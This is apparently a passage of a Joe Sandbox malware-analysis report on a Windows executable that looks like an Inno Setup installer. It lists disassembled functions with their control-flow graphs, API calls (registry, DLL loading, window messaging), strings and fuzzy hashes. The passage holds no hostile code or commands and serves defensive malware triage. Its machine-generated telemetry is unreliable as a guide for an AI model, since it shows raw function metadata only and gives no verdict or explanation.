430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1028
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                                              • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                                            • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$Close
                                                                                                                            • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                                                            • API String ID: 3391052094-3342197833
                                                                                                                            • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                                            • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                                                            • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                                            • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00492848 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1051 492848-49287c call 403684 1054 49287e-49288d call 446f9c Sleep 1051->1054 1055 492892-49289f call 403684 1051->1055 1060 492d22-492d3c call 403420 1054->1060 1061 4928ce-4928db call 403684 1055->1061 1062 4928a1-4928c4 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49290a-492917 call 403684 1061->1070 1071 4928dd-492905 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1080 4928c9 1062->1080 1078 492919-49295b call 446f9c * 4 SendMessageA call 447278 1070->1078 1079 492960-49296d call 403684 1070->1079 1071->1060 1078->1060 1090 4929bc-4929c9 call 403684 1079->1090 1091 49296f-4929b7 call 446f9c * 4 PostMessageA call 4470d0 1079->1091 1080->1060 1100 492a18-492a25 call 403684 1090->1100 1101 4929cb-492a13 call 446f9c * 4 SendNotifyMessageA call 4470d0 1090->1101 1091->1060 1113 492a52-492a5f call 403684 1100->1113 1114 492a27-492a4d call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1100->1114 1101->1060 1125 492a61-492a9b call 446f9c * 3 SendMessageA call 447278 1113->1125 1126 492aa0-492aad call 403684 1113->1126 1114->1060 1125->1060 1138 492aaf-492aef call 446f9c * 3 PostMessageA call 4470d0 1126->1138 1139 492af4-492b01 call 403684 1126->1139 1138->1060 1152 492b48-492b55 call 403684 1139->1152 1153 492b03-492b43 call 446f9c * 3 SendNotifyMessageA call 4470d0 1139->1153 1164 492baa-492bb7 call 403684 1152->1164 1165 492b57-492b75 call 446ff8 call 42e394 1152->1165 1153->1060 1175 492bb9-492be5 call 446ff8 call 403738 call 446f9c GetProcAddress 1164->1175 1176 492c31-492c3e call 403684 1164->1176 1185 492b87-492b95 GetLastError call 447278 1165->1185 1186 492b77-492b85 call 447278 1165->1186 1206 492c21-492c2c call 4470d0 1175->1206 1207 492be7-492c1c call 446f9c * 2 call 447278 call 4470d0 1175->1207 1187 492c40-492c61 call 446f9c FreeLibrary call 4470d0 1176->1187 1188 492c66-492c73 call 403684 1176->1188 1194 492b9a-492ba5 call 447278 1185->1194 1186->1194 1187->1060 1203 492c98-492ca5 call 403684 1188->1203 1204 492c75-492c93 call 446ff8 call 403738 CreateMutexA 1188->1204 1194->1060 1215 492cdb-492ce8 call 403684 1203->1215 1216 492ca7-492cd9 call 48ccc8 call 403574 call 403738 OemToCharBuffA call 48cce0 1203->1216 1204->1060 1206->1060 1207->1060 1228 492cea-492d1c call 48ccc8 call 403574 call 403738 CharToOemBuffA call 48cce0 1215->1228 1229 492d1e 1215->1229 1216->1060 1228->1060 1229->1060
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                                                            • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FindSleepWindow
                                                                                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                                            • API String ID: 3078808852-3310373309
                                                                                                                            • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                                            • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                                                            • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                                            • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00483A7C Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1632 483ac8-483acc 1625->1632 1630 483b4d-483b52 1626->1630 1628 483b23-483b27 1627->1628 1629 483b34-483b3b 1627->1629 1633 483b29-483b46 1628->1633 1634 483b3d-483b44 1628->1634 1629->1630 1632->1624 1635 483ace-483ad5 call 45271c 1632->1635 1633->1630 1634->1630 1635->1624 1639 483ad7-483ae4 GetProcAddress 1635->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                                            • API String ID: 2230631259-2623177817
                                                                                                                            • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                                            • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                                                            • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                                            • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00468D88 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1647 468d88-468dc0 call 47c26c 1650 468dc6-468dd6 call 478e24 1647->1650 1651 468fa2-468fbc call 403420 1647->1651 1656 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1650->1656 1662 468e25-468e27 1656->1662 1663 468e2d-468e42 1662->1663 1664 468f98-468f9c 1662->1664 1665 468e57-468e5e 1663->1665 1666 468e44-468e52 call 42dd4c 1663->1666 1664->1651 1664->1656 1668 468e60-468e82 call 42dd4c call 42dd64 1665->1668 1669 468e8b-468e92 1665->1669 1666->1665 1668->1669 1686 468e84 1668->1686 1670 468e94-468eb9 call 42dd4c * 2 1669->1670 1671 468eeb-468ef2 1669->1671 1693 468ebb-468ec4 call 4314f8 1670->1693 1694 468ec9-468edb call 42dd4c 1670->1694 1673 468ef4-468f06 call 42dd4c 1671->1673 1674 468f38-468f3f 1671->1674 1687 468f16-468f28 call 42dd4c 1673->1687 1688 468f08-468f11 call 4314f8 1673->1688 1680 468f41-468f75 call 42dd4c * 3 1674->1680 1681 468f7a-468f90 RegCloseKey 1674->1681 1680->1681 1686->1669 1687->1674 1701 468f2a-468f33 call 4314f8 1687->1701 1688->1687 1693->1694 1694->1671 1704 468edd-468ee6 call 4314f8 1694->1704 1701->1674 1704->1671
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                                                            Strings
                                                                                                                            • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                                                            • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                                                            • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                                                            • Inno Setup: No Icons, xrefs: 00468E73
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                                                            • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                                                            • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                                                            • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                                                            • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                                                            • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                                                            • Inno Setup: App Path, xrefs: 00468E4A
                                                                                                                            • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                                                            • %s\%s_is1, xrefs: 00468E05
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen
                                                                                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                            • API String ID: 47109696-1093091907
                                                                                                                            • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                                            • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                                                            • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                                            • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047C66C Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 187COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                              • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                                              • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                                            • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                                                            • 76CF83B0.OLE32(?,0047C88B), ref: 0047C87E
                                                                                                                              • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Directory$AddressEnvironmentFolderHandleKnownModulePathProcSystemVariableWindows
                                                                                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                                            • API String ID: 356131955-544719455
                                                                                                                            • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                                            • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                                                            • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                                            • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00423874 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98windowregistryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1960 4238f1 1958->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1961 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                                            • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                                                            • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                                                            • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                                                            • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                                                            • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                                            • String ID: |6B
                                                                                                                            • API String ID: 183575631-3009739247
                                                                                                                            • Opcode ID: 5571f2138a9ea83ce0d9c1dcd1b3cc51cb16f92404a0700befc21e2951ab6ca0
                                                                                                                            • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                                                            • Opcode Fuzzy Hash: 5571f2138a9ea83ce0d9c1dcd1b3cc51cb16f92404a0700befc21e2951ab6ca0
                                                                                                                            • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047CE78 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1997 47cefb-47cf01 1994->1997 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1997->1991 1997->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32(74AE0000,SHGetFolderPathA), ref: 0047CF7A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc
                                                                                                                            • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                                                            • API String ID: 190572456-256906917
                                                                                                                            • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                                            • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                                                            • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                                            • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040631C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
